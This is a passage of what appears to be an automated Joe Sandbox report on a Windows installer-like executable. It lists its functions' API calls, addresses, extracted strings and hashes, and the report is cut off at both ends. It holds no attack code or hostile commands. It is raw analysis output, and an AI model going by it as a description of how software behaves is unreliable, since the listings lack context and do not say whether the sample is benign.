                          • GetDlgItem.USER32(?,?), ref: 00405523
                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                          • EnableWindow.USER32(?,?), ref: 0040573C
                          • EnableWindow.USER32(?,?), ref: 00405757
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                          • EnableMenuItem.USER32(00000000), ref: 00405774
                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                          • String ID: @rD
                          • API String ID: 184305955-3814967855
                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                          Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                          Download Yara Rule
                          APIs
                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                          • GetSysColor.USER32(?), ref: 004041AF
                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                          • lstrlenW.KERNEL32(?), ref: 004041D6
                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                          • SendMessageW.USER32(00000000), ref: 00404251
                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                          • SetCursor.USER32(00000000), ref: 004042D2
                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                          • SetCursor.USER32(00000000), ref: 004042F6
                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                          • String ID: @%F$N$open
                          • API String ID: 3928313111-3849437375
                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                          Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                          • wsprintfA.USER32 ref: 00406B4D
                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                          • String ID: F$%s=%s$NUL$[Rename]
                          • API String ID: 565278875-1653569448
                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                          Download Yara Rule
                          APIs
                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                          • DeleteObject.GDI32(?), ref: 004010F6
                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                          • SelectObject.GDI32(00000000,?), ref: 00401149
                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                          • DeleteObject.GDI32(?), ref: 0040116E
                          • EndPaint.USER32(?,?), ref: 00401177
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F
                          • API String ID: 941294808-1304234792
                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                          Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Strings
                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: lstrlen$CloseCreateValuewvsprintf
                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                          • API String ID: 1641139501-220328614
                          • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                          • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                          Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                          Strings
                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                          • String ID: created uninstaller: %d, "%s"
                          • API String ID: 3294113728-3145124454
                          • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                          • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                          Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                          • String ID: RMDir: RemoveDirectory invalid input("")
                          • API String ID: 3734993849-2769509956
                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                          Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                          • GetSysColor.USER32(00000000), ref: 00403E00
                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                          • SetBkMode.GDI32(?,?), ref: 00403E18
                          • GetSysColor.USER32(?), ref: 00403E2B
                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                          • DeleteObject.GDI32(?), ref: 00403E55
                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                          Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                          Strings
                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                          • API String ID: 1033533793-945480824
                          • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                          • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                          Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                          • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                          • String ID:
                          • API String ID: 2740478559-0
                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                          Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                          Strings
                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                          • Exec: success ("%s"), xrefs: 00402263
                          • Exec: command="%s", xrefs: 00402241
                          Memory Dump Source
